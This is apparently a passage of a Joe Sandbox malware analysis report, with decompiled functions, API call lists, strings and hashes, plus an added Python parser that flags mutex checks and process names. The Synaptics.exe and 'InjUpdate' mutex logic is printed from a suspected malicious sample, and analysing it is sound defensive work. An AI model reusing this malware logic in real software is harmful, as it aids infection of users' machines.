                                                    					E0040A1D4( *((intOrPtr*)(_t111 + 0x64)));
                                                    					 *((intOrPtr*)(_t111 + 0x64)) = 0;
                                                    					L00441A14(_t111);
                                                    					E0043C130(_t111, E00424E24( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1); // executed
                                                    					_t130 =  *((char*)(_t111 + 0x5c));
                                                    					if( *((char*)(_t111 + 0x5c)) != 0) {
                                                    						L00403DE8(_t111, _t130);
                                                    					}
                                                    					_pop(_t104);
                                                    					 *[fs:eax] = _t104;
                                                    					_push(0x43e884);
                                                    					return E004049C0( &_v196);
                                                    				} else {
                                                    					_t94 =  *((intOrPtr*)(__eax + 4));
                                                    					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
                                                    						L6:
                                                    						_v192 =  *((intOrPtr*)(_t111 + 8));
                                                    						_v188 = 0xb;
                                                    						_t86 =  *0x49dc4c; // 0x422f30
                                                    						E00406A70(_t86,  &_v196);
                                                    						_t95 = _v196;
                                                    						E0040D180(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
                                                    						E00404378();
                                                    					} else {
                                                    						_t108 =  *0x437498; // 0x4374e4
                                                    						if(L00403D78(_t94, _t108) == 0) {
                                                    							goto L6;
                                                    						}
                                                    						_v116 = E00441704(_t94);
                                                    					}
                                                    					goto L7;
                                                    				}
                                                    			}

                                                    Instruction addresses (one per decompiled line, spilled from the side-by-side listing): 0x0043e6bc to 0x0043e87c

                                                    APIs
                                                    • GetClassInfoA.USER32 ref: 0043E780
                                                    • UnregisterClassA.USER32 ref: 0043E7A8
                                                    • RegisterClassA.USER32 ref: 0043E7BE
                                                    • GetWindowLongA.USER32 ref: 0043E7FA
                                                    • GetWindowLongA.USER32 ref: 0043E80F
                                                    • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0043E822
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClassLongWindow$InfoRegisterUnregister
                                                    • String ID: 0/B$@$tC
                                                    • API String ID: 717780171-775952512
                                                    • Opcode ID: ad2174255326ac0a5e8adcf355344906cc0e0926d4dd3e2aaec39b383c119ffd
                                                    • Instruction ID: ef2cd423dbe362dacdbee8c2275ea56bb610ff0c2a9daaab76c1ee9f024234ac
                                                    • Opcode Fuzzy Hash: ad2174255326ac0a5e8adcf355344906cc0e0926d4dd3e2aaec39b383c119ffd
                                                    • Instruction Fuzzy Hash: 90518E70A013549BEB20EB6ACC41B9A77F9AF09308F10457EE845E73D2DB38AD45CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 72%
                                                    			E00401B60() {
                                                    				void* _t2;
                                                    				void* _t3;
                                                    				void* _t14;
                                                    				intOrPtr* _t19;
                                                    				intOrPtr _t23;
                                                    				intOrPtr _t26;
                                                    				intOrPtr _t28;
                                                    
                                                    				_t26 = _t28;
                                                    				if( *0x49e5c4 == 0) {
                                                    					return _t2;
                                                    				} else {
                                                    					_push(_t26);
                                                    					_push(0x401c36);
                                                    					_push( *[fs:edx]);
                                                    					 *[fs:edx] = _t28;
                                                    					if( *0x49e04d != 0) {
                                                    						_push(0x49e5cc);
                                                    						L004013F8();
                                                    					}
                                                    					 *0x49e5c4 = 0;
                                                    					_t3 =  *0x49e624; // 0x0
                                                    					LocalFree(_t3);
                                                    					 *0x49e624 = 0;
                                                    					_t19 =  *0x49e5ec; // 0x49e5ec
                                                    					while(_t19 != 0x49e5ec) {
                                                    						_t1 = _t19 + 8; // 0x0
                                                    						VirtualFree( *_t1, 0, 0x8000); // executed
                                                    						_t19 =  *_t19;
                                                    					}
                                                    					E00401460(0x49e5ec);
                                                    					E00401460(0x49e5fc);
                                                    					E00401460(0x49e628);
                                                    					_t14 =  *0x49e5e4; // 0x0
                                                    					while(_t14 != 0) {
                                                    						 *0x49e5e4 =  *_t14;
                                                    						LocalFree(_t14);
                                                    						_t14 =  *0x49e5e4; // 0x0
                                                    					}
                                                    					_pop(_t23);
                                                    					 *[fs:eax] = _t23;
                                                    					_push(0x401c3d);
                                                    					if( *0x49e04d != 0) {
                                                    						_push(0x49e5cc);
                                                    						L00401400();
                                                    					}
                                                    					_push(0x49e5cc);
                                                    					L00401408();
                                                    					return 0;
                                                    				}
                                                    			}

                                                    APIs
                                                    • RtlEnterCriticalSection.KERNEL32(Function_0009E5CC,00000000,00401C36), ref: 00401B8D
                                                    • LocalFree.KERNEL32(00000000,00000000,00401C36), ref: 00401B9F
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BBE
                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BFD
                                                    • RtlLeaveCriticalSection.KERNEL32(Function_0009E5CC,00401C3D,00000000,00000000,00401C36), ref: 00401C26
                                                    • RtlDeleteCriticalSection.KERNEL32(Function_0009E5CC,00401C3D,00000000,00000000,00401C36), ref: 00401C30
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                    • String ID: (I$I
                                                    • API String ID: 3782394904-2351459270
                                                    • Opcode ID: e4fa71282194ec4da96e7a5da48f96cf9d8c0e0a2707d54dfd074da16348a234
                                                    • Instruction ID: 63aebc4cd3b04fdf267fff4595653c8a60232739778a968a80e4263db5fe1b04
                                                    • Opcode Fuzzy Hash: e4fa71282194ec4da96e7a5da48f96cf9d8c0e0a2707d54dfd074da16348a234
                                                    • Instruction Fuzzy Hash: D111AC706042407EEB21EBA79D55B163BD8A71571CF91407BF004A62F2E67CAC00CB2E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 51%
                                                    			E0049A3E0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				intOrPtr _t27;
                                                    				void* _t29;
                                                    				void* _t31;
                                                    				intOrPtr _t32;
                                                    				char _t33;
                                                    				intOrPtr _t38;
                                                    				void* _t39;
                                                    				void* _t48;
                                                    				intOrPtr _t49;
                                                    				intOrPtr _t51;
                                                    				intOrPtr _t53;
                                                    				intOrPtr _t55;
                                                    				intOrPtr _t57;
                                                    				intOrPtr _t59;
                                                    				intOrPtr _t61;
                                                    				void* _t62;
                                                    				intOrPtr _t69;
                                                    				intOrPtr _t73;
                                                    				void* _t83;
                                                    				void* _t86;
                                                    				intOrPtr _t92;
                                                    				void* _t97;
                                                    				void* _t98;
                                                    				intOrPtr _t103;
                                                    				intOrPtr _t127;
                                                    
                                                    				_t137 = __fp0;
                                                    				_t124 = __esi;
                                                    				_t123 = __edi;
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_t92 = __eax;
                                                    				_push(_t127);
                                                    				_push(0x49a5ef);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t127;
                                                    				if(__edx == 0) {
                                                    					E004967D4(__eax, __eax, "ControlCenter -> Pasif");
                                                    					__eflags = 0;
                                                    					E0049A098(_t92, _t92, 0, 0, __edi, __esi, __fp0, 0, 0, 0, 0, 0);
                                                    					L14:
                                                    					_pop(_t103);
                                                    					 *[fs:eax] = _t103;
                                                    					_push(0x49a5f6);
                                                    					return E004049E4( &_v20, 4);
                                                    				}
                                                    				E004967D4(__eax, __eax, "ControlCenter -> Aktif");
                                                    				if( *((intOrPtr*)(_t92 + 0x308)) == 0) {
                                                    					 *((intOrPtr*)(_t92 + 0x308)) = E0045C064(_t92, 1);
                                                    				}
                                                    				_t27 =  *((intOrPtr*)(_t92 + 0x308));
                                                    				 *((intOrPtr*)(_t27 + 0x44)) = _t92;
                                                    				 *((intOrPtr*)(_t27 + 0x40)) = 0x49a668;
                                                    				_t29 = E004738BC(0, _t92); // executed
                                                    				_t31 = E00441704(_t92);
                                                    				_t32 =  *0x49d6b8; // 0x0
                                                    				_t97 = _t29; // executed
                                                    				_t33 = E00477AD8(_t32, _t92, _t31, _t123, _t124); // executed
                                                    				 *0x49f149 = _t33;
                                                    				E00402B68(1,  &_v8);
                                                    				E00404DCC(_v8, "InjUpdate");
                                                    				if(0 != 0) {
                                                    					L8:
                                                    					_t38 =  *0x49d6b4; // 0x0, executed
                                                    					_t39 = E0047423C(_t38, _t92, 1, _t124, _t133); // executed
                                                    					if(_t39 != 0) {
                                                    						E0045A800();
                                                    					} else {
                                                    						E00498684(_t92, _t92, _t123, _t124); // executed
                                                    						E00498F04(_t92, _t123, _t124); // executed
                                                    						_t48 = E00498B40(_t92, _t92, _t123, _t124); // executed
                                                    						if(_t48 == 0) {
                                                    							_t49 =  *0x49f1b0; // 0x0
                                                    							_push(E00409780(_t49, _t97, 1, __eflags));
                                                    							_t51 =  *0x49f1b4; // 0x0
                                                    							_push(E00409780(_t51, _t97, 1, __eflags));
                                                    							_t53 =  *0x49f1b8; // 0x0
                                                    							_push(E00409780(_t53, _t97, 1, __eflags));
                                                    							_t55 =  *0x49f1bc; // 0x0
                                                    							_push(E00409780(_t55, _t97, 1, __eflags));
                                                    							_t57 =  *0x49f1c0; // 0x0
                                                    							_push(E00409780(_t57, _t97, 1, __eflags));
                                                    							_t59 =  *0x49f1a8; // 0x0
                                                    							_push(E00409780(_t59, _t97, 1, __eflags));
                                                    							_t61 =  *0x49f1a4; // 0x0
                                                    							_t62 = E00409780(_t61, _t97, 1, __eflags);
                                                    							_pop(_t98);
                                                    							E0049A098(_t92, _t92, _t98, _t62, _t123, _t124, _t137);
                                                    							L00499FAC(_t92, 1);
                                                    						} else {
                                                    							E00498998(_t92, _t92, 1, _t123, _t124); // executed
                                                    						}
                                                    					}
                                                    					goto L14;
                                                    				}
                                                    				_t69 =  *0x49d6b4; // 0x0
                                                    				_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t69));
                                                    				_t131 = _t124;
                                                    				if(_t124 == 0) {
                                                    					goto L8;
                                                    				} else {
                                                    					goto L5;
                                                    				}
                                                    				do {
                                                    					L5:
                                                    					CloseHandle(_t124);
                                                    					_t73 =  *0x49d6b4; // 0x0
                                                    					_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t73));
                                                    					E004737B0( &_v12);
                                                    					_push( &_v12);
                                                    					E00402B68(0,  &_v20);
                                                    					L00409E18(_v20,  &_v16);
                                                    					_pop(_t83);
                                                    					E00404C88(_t83, _v16);
                                                    					_t86 = E00409A48(_v12, _t131);
                                                    					_t132 = _t86;
                                                    					if(_t86 != 0) {
                                                    						L00475A94("Synaptics.exe", _t92, _t123, _t124, _t132);
                                                    					}
                                                    					_t133 = _t124;
                                                    				} while (_t124 != 0);
                                                    				goto L8;
                                                    			}


                                                    APIs
                                                    • OpenMutexA.KERNEL32 ref: 0049A48F
                                                    • CloseHandle.KERNEL32(00000000,001F0001,00000000,00000000), ref: 0049A49B
                                                    • OpenMutexA.KERNEL32 ref: 0049A4B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MutexOpen$CloseHandle
                                                    • String ID: ControlCenter -> Aktif$ControlCenter -> Pasif$InjUpdate$Synaptics.exe
                                                    • API String ID: 1942958553-1737343353
                                                    • Opcode ID: 698df5902b6dd65d62d8a088d3dc5d77190b0f7002f4ad2b0891d715899b60e5
                                                    • Instruction ID: 032596fc6928d1f920dd250c266260124ec275c25dbd90c6f41682d3cc039f83
                                                    • Opcode Fuzzy Hash: 698df5902b6dd65d62d8a088d3dc5d77190b0f7002f4ad2b0891d715899b60e5
                                                    • Instruction Fuzzy Hash: 8B5149716002009FDB00EF6ADC82A9A37A9AB54308B11457FF804EB393DA7DED19879D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
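Each decompiled function in this report ends with the same footer: the resolved API calls with their call-site addresses, then the "API ID", "String ID" and "Opcode ID" lines under Similarity. The parser below is an added example for this page, not code from Joe Sandbox or from the analysed sample. It pulls those footers into records and applies three checks that the second function above motivates: a named-mutex open (OpenMutexA), the MUTEX_ALL_ACCESS mask 0x1F0001 left among a call site's stack arguments, and a process image name among the strings. SAMPLE_REPORT is constructed from the two footers above; the three heuristics and the field set parsed are assumptions, and the mutex name itself is not in the report (it is read from a global at runtime).

```python
"""Parse Joe Sandbox per-function footers and flag behaviours worth a look.

Added example; not part of Joe Sandbox or of the sample. Assumed input shape:
a "C-Code - Quality: N%" header opens each function, API bullets read
"• Api.MODULE(args), ref: ADDR", Similarity bullets read "• Field: value".
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | MUTANT_QUERY_STATE
MUTEX_ALL_ACCESS = 0x001F0001
MUTEX_APIS = {"OpenMutexA", "OpenMutexW", "CreateMutexA", "CreateMutexW"}

# Constructed from the two function footers on this page.
SAMPLE_REPORT = """\
C-Code - Quality: 72%
APIs
• RtlEnterCriticalSection.KERNEL32(Function_0009E5CC,00000000,00401C36), ref: 00401B8D
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BBE
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID: (I$I
• Opcode ID: e4fa71282194ec4da96e7a5da48f96cf9d8c0e0a2707d54dfd074da16348a234
C-Code - Quality: 51%
APIs
• OpenMutexA.KERNEL32 ref: 0049A48F
• CloseHandle.KERNEL32(00000000,001F0001,00000000,00000000), ref: 0049A49B
• OpenMutexA.KERNEL32 ref: 0049A4B2
Similarity
• API ID: MutexOpen$CloseHandle
• String ID: ControlCenter -> Aktif$ControlCenter -> Pasif$InjUpdate$Synaptics.exe
• Opcode ID: 698df5902b6dd65d62d8a088d3dc5d77190b0f7002f4ad2b0891d715899b60e5
"""

HEADER_RE = re.compile(r"^C-Code - Quality: (\d+)%$")
API_RE = re.compile(
    r"^• (?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^• (API ID|String ID|Opcode ID): (.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple  # ints for 8-digit hex words, str for symbolic ones
    ref: int     # call-site address


@dataclass
class FunctionSummary:
    quality: int
    apis: list = field(default_factory=list)
    api_id: str = ""
    strings: list = field(default_factory=list)
    opcode_id: str = ""


def _arg(tok: str):
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok


def parse_functions(text: str) -> list:
    """Split the report at each C-Code header and collect that function's footer."""
    funcs, cur = [], None  # type: list, Optional[FunctionSummary]
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER_RE.match(line)
        if m:
            cur = FunctionSummary(quality=int(m.group(1)))
            funcs.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(_arg(a) for a in m["args"].split(",")) if m["args"] else ()
            cur.apis.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16)))
            continue
        m = FIELD_RE.match(line)
        if m:
            key, val = m.groups()
            if key == "API ID":
                cur.api_id = val
            elif key == "String ID":
                cur.strings = val.split("$")  # the report joins strings with "$"
            else:
                cur.opcode_id = val
    return funcs


def flag(fn: FunctionSummary) -> list:
    """Heuristics over one footer; each hit names the evidence it rests on."""
    hits, names = [], {a.name for a in fn.apis}
    mutex = sorted(names & MUTEX_APIS)
    if mutex:
        hits.append("named-mutex instance check (" + ", ".join(mutex) + ")")
    if any(MUTEX_ALL_ACCESS in a.args for a in fn.apis):
        hits.append("MUTEX_ALL_ACCESS (0x1F0001) among call-site stack arguments")
    for s in fn.strings:
        if s.lower().endswith(".exe"):
            hits.append("process image name in strings: " + s)
    return hits


def triage(text: str) -> dict:
    """Opcode ID (the key to pivot on across reports) -> flags, flagged functions only."""
    out = {}
    for fn in parse_functions(text):
        hits = flag(fn)
        if hits:
            out[fn.opcode_id] = hits
    return out


if __name__ == "__main__":
    for oid, hits in triage(SAMPLE_REPORT).items():
        print(oid[:16], *hits, sep="\n  ")
```

The first function (the critical-section and VirtualFree teardown) produces no hits, which is the intended outcome: the rules are about instance control and process targeting, not memory management. Keying the result on the Opcode ID lets the same flags be matched against other reports that share the function body.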

                                                    Control-flow Graph

                                                    C-Code - Quality: 94%
                                                    			E004590AC(void* __ecx, char __edx) {
                                                    				char _v5;
                                                    				char _v261;
                                                    				void* __ebx;
                                                    				void* __ebp;
                                                    				intOrPtr _t39;
                                                    				intOrPtr _t42;
                                                    				intOrPtr _t43;
                                                    				struct HINSTANCE__** _t53;
                                                    				struct HICON__* _t55;
                                                    				intOrPtr _t58;
                                                    				struct HINSTANCE__** _t60;
                                                    				void* _t67;
                                                    				char* _t69;
                                                    				char* _t75;
                                                    				intOrPtr _t81;
                                                    				intOrPtr* _t88;
                                                    				intOrPtr* _t89;
                                                    				intOrPtr _t90;
                                                    				void* _t91;
                                                    				char _t93;
                                                    				void* _t104;
                                                    				void* _t105;
                                                    
                                                    				_t93 = __edx;
                                                    				_t91 = __ecx;
                                                    				if(__edx != 0) {
                                                    					_t105 = _t105 + 0xfffffff0;
                                                    					_t39 = L00403F10(_t39, _t104);
                                                    				}
                                                    				_v5 = _t93;
                                                    				_t90 = _t39;
                                                    				L00421B3C(_t91, 0);
                                                    				_t42 =  *0x49dabc; // 0x49b520
                                                    				if( *((short*)(_t42 + 2)) == 0) {
                                                    					_t89 =  *0x49dabc; // 0x49b520
                                                    					 *((intOrPtr*)(_t89 + 4)) = _t90;
                                                    					 *_t89 = 0x45a814;
                                                    				}
                                                    				_t43 =  *0x49dc10; // 0x49b528
                                                    				if( *((short*)(_t43 + 2)) == 0) {
                                                    					_t88 =  *0x49dc10; // 0x49b528
                                                    					 *((intOrPtr*)(_t88 + 4)) = _t90;
                                                    					 *_t88 = E0045AA0C;
                                                    				}
                                                    				 *((char*)(_t90 + 0x34)) = 0;
                                                    				 *((intOrPtr*)(_t90 + 0x90)) = L00403BBC(1);
                                                    				 *((intOrPtr*)(_t90 + 0xa8)) = L00403BBC(1);
                                                    				 *((intOrPtr*)(_t90 + 0x60)) = 0;
                                                    				 *((intOrPtr*)(_t90 + 0x84)) = 0;
                                                    				 *((intOrPtr*)(_t90 + 0x5c)) = 0xff000018;
                                                    				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
                                                    				 *((char*)(_t90 + 0x7c)) = 1;
                                                    				 *((intOrPtr*)(_t90 + 0x80)) = 0;
                                                    				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
                                                    				 *((char*)(_t90 + 0x88)) = 0;
                                                    				 *((char*)(_t90 + 0x9d)) = 1;
                                                    				 *((char*)(_t90 + 0xb4)) = 1;
                                                    				_t103 = E0042B3F8(1);
                                                    				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
                                                    				_t53 =  *0x49d93c; // 0x49e030
                                                    				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
                                                    				E0042B7C8(_t103, _t55);
                                                    				_t20 = _t90 + 0x98; // 0x736d
                                                    				_t58 =  *_t20;
                                                    				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
                                                    				 *((intOrPtr*)(_t58 + 0x10)) = 0x45afac;
                                                    				_t60 =  *0x49d93c; // 0x49e030
                                                    				GetModuleFileNameA( *_t60,  &_v261, 0x100);
                                                    				OemToCharA( &_v261,  &_v261);
                                                    				_t67 = E0040E020(0x5c);
                                                    				if(_t67 != 0) {
                                                    					_t27 = _t67 + 1; // 0x1
                                                    					L00409FC4( &_v261, _t27);
                                                    				}
                                                    				_t69 = E0040E048( &_v261, 0x2e);
                                                    				if(_t69 != 0) {
                                                    					 *_t69 = 0;
                                                    				}
                                                    				CharLowerA( &(( &_v261)[1]));
                                                    				_t31 = _t90 + 0x8c; // 0x45150c
                                                    				E00404C30(_t31, 0x100,  &_v261);
                                                    				_t75 =  *0x49d6e4; // 0x49e038
                                                    				if( *_t75 == 0) {
                                                    					E004593B4(_t90, _t90, 0x100); // executed
                                                    				}
                                                    				 *((char*)(_t90 + 0x59)) = 1;
                                                    				 *((char*)(_t90 + 0x5a)) = 1;
                                                    				 *((char*)(_t90 + 0x5b)) = 1;
                                                    				 *((char*)(_t90 + 0x9e)) = 1;
                                                    				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
                                                    				E0045B188(_t90, 0x100);
                                                    				L0045BB4C(_t90);
                                                    				_t81 = _t90;
                                                    				if(_v5 != 0) {
                                                    					L00403F68(_t81);
                                                    					_pop( *[fs:0x0]);
                                                    				}
                                                    				return _t90;
                                                    			}

                                                    APIs
                                                    • LoadIconA.USER32 ref: 00459191
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                    • OemToCharA.USER32 ref: 004591D6
                                                    • CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000), ref: 00459216
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Char$FileIconLoadLowerModuleName
                                                    • String ID: 0I$8I$MAINICON
                                                    • API String ID: 3935243913-3756263232
                                                    • Opcode ID: 6d8b1a9b1b3b0c8ce7000258a2abcab798a72233c8836065be33f0d47b441d7d
                                                    • Instruction ID: 5a9b49fbd3013c0ee8ebc8f701b73d14000c1e337c5d680fa8568d3dadbd01b2
                                                    • Opcode Fuzzy Hash: 6d8b1a9b1b3b0c8ce7000258a2abcab798a72233c8836065be33f0d47b441d7d
                                                    • Instruction Fuzzy Hash: 8E516170A042449FD740EF29C885B857BE4AB15308F4484FAEC48DF397DBBD9988CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 53%
                                                    			E00474948(char __eax, void* __ebx, void* __ecx, char __edx) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				intOrPtr _v16;
                                                    				char _v20;
                                                    				intOrPtr _v24;
                                                    				char _v28;
                                                    				char _v32;
                                                    				signed short* _v36;
                                                    				char _v40;
                                                    				char _v44;
                                                    				char _v48;
                                                    				char _v52;
                                                    				signed int _v56;
                                                    				char _v60;
                                                    				signed int _v64;
                                                    				intOrPtr _t52;
                                                    				void* _t65;
                                                    				intOrPtr _t71;
                                                    				intOrPtr _t76;
                                                    				void* _t93;
                                                    				intOrPtr _t101;
                                                    				intOrPtr _t103;
                                                    				void* _t109;
                                                    				void* _t110;
                                                    				intOrPtr _t111;
                                                    
                                                    				_t109 = _t110;
                                                    				_t111 = _t110 + 0xffffffc4;
                                                    				_v40 = 0;
                                                    				_t93 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t109);
                                                    				_push(0x474ab3);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t111;
                                                    				E004049C0(__ecx);
                                                    				_v32 = 0xff;
                                                    				_push( &_v28);
                                                    				_t52 = E00404ED8( &_v8);
                                                    				_push(_t52); // executed
                                                    				L004072A8(); // executed
                                                    				_v24 = _t52;
                                                    				if(_v24 == 0) {
                                                    					_pop(_t101);
                                                    					 *[fs:eax] = _t101;
                                                    					_push(0x474aba);
                                                    					E004049C0( &_v40);
                                                    					return E004049E4( &_v12, 2);
                                                    				} else {
                                                    					_v16 = E0040275C(_v24);
                                                    					_push(_t109);
                                                    					_push(0x474a89);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t111;
                                                    					_push(_v16);
                                                    					_push(_v24);
                                                    					_push(_v28);
                                                    					_t65 = E00404ED8( &_v8);
                                                    					_push(_t65); // executed
                                                    					L004072A0(); // executed
                                                    					if(_t65 != 0) {
                                                    						_push( &_v32);
                                                    						_push( &_v36);
                                                    						_push("\\VarFileInfo\\Translation");
                                                    						_t71 = _v16;
                                                    						_push(_t71);
                                                    						L004072B0();
                                                    						if(_t71 != 0) {
                                                    							_v64 =  *_v36 & 0x0000ffff;
                                                    							_v60 = 0;
                                                    							_v56 = L004079DC( *_v36) & 0x0000ffff;
                                                    							_v52 = 0;
                                                    							_v48 = _v12;
                                                    							_v44 = 0xb;
                                                    							E0040A664("\\StringFileInfo\\%0.4x%0.4x\\%s", 2,  &_v64,  &_v40);
                                                    							E00404A58( &_v12, _v40);
                                                    						}
                                                    						_push( &_v32);
                                                    						_push( &_v20);
                                                    						_push(E00404ED8( &_v12));
                                                    						_t76 = _v16;
                                                    						_push(_t76);
                                                    						L004072B0();
                                                    						if(_t76 != 0) {
                                                    							E0040A174(_v20, _t93);
                                                    						}
                                                    					}
                                                    					_pop(_t103);
                                                    					 *[fs:eax] = _t103;
                                                    					_push(0x474a90);
                                                    					return E0040277C(_v16);
                                                    				}
                                                    			}

                                                    APIs
                                                    • 73E714E0.VERSION(00000000,?,00000000,00474AB3), ref: 00474995
                                                    • 73E714C0.VERSION(00000000,?,00000000,?,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749D5
                                                    • 73E71500.VERSION(?,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,?,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749F3
                                                    • 73E71500.VERSION(?,00000000,?,000000FF,?,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,?,00000000,00474A89,?,00000000), ref: 00474A5D
                                                    Strings
                                                    • \VarFileInfo\Translation, xrefs: 004749EA
                                                    • \StringFileInfo\%0.4x%0.4x\%s, xrefs: 00474A33
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: E714E71500
                                                    • String ID: \StringFileInfo\%0.4x%0.4x\%s$\VarFileInfo\Translation
                                                    • API String ID: 457087618-999260334
                                                    • Opcode ID: 428405fc8f6f2371291a775979248c6c5c1afe28fb968c4bd3e1fc8a87eda9b2
                                                    • Instruction ID: 32f586d465f208a33ace568febe6e2dc1f3a77b47997a46495fde34554132249
                                                    • Opcode Fuzzy Hash: 428405fc8f6f2371291a775979248c6c5c1afe28fb968c4bd3e1fc8a87eda9b2
                                                    • Instruction Fuzzy Hash: 7941ECB1D04209AFDB01EBE5D981AEFB7F8AB48304F50447AF514F3291D738AE048B69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 89%
                                                    			E004587A4(void* __eax, void* __ebx, void* __ecx, void* __edi) {
                                                    				char _v5;
                                                    				struct tagLOGFONTA _v65;
                                                    				struct tagLOGFONTA _v185;
                                                    				struct tagLOGFONTA _v245;
                                                    				void _v405;
                                                    				void* _t23;
                                                    				int _t27;
                                                    				void* _t30;
                                                    				intOrPtr _t38;
                                                    				struct HFONT__* _t41;
                                                    				struct HFONT__* _t45;
                                                    				struct HFONT__* _t49;
                                                    				intOrPtr _t52;
                                                    				intOrPtr _t54;
                                                    				void* _t57;
                                                    				void* _t72;
                                                    				void* _t74;
                                                    				void* _t75;
                                                    				intOrPtr _t76;
                                                    
                                                    				_t72 = __edi;
                                                    				_t74 = _t75;
                                                    				_t76 = _t75 + 0xfffffe6c;
                                                    				_t57 = __eax;
                                                    				_v5 = 0;
                                                    				if( *0x49ebb8 != 0) {
                                                    					_t54 =  *0x49ebb8; // 0x0
                                                    					_v5 =  *((intOrPtr*)(_t54 + 0x88));
                                                    				}
                                                    				_push(_t74);
                                                    				_push(0x4588e9);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t76;
                                                    				if( *0x49ebb8 != 0) {
                                                    					_t52 =  *0x49ebb8; // 0x0
                                                    					E0045AD24(_t52, 0);
                                                    				}
                                                    				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
                                                    					_t23 = GetStockObject(0xd);
                                                    					_t7 = _t57 + 0x84; // 0x38004010
                                                    					E00424FCC( *_t7, _t23, _t72);
                                                    				} else {
                                                    					_t49 = CreateFontIndirectA( &_v65); // executed
                                                    					_t6 = _t57 + 0x84; // 0x38004010
                                                    					E00424FCC( *_t6, _t49, _t72);
                                                    				}
                                                    				_v405 = 0x154;
                                                    				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
                                                    				if(_t27 == 0) {
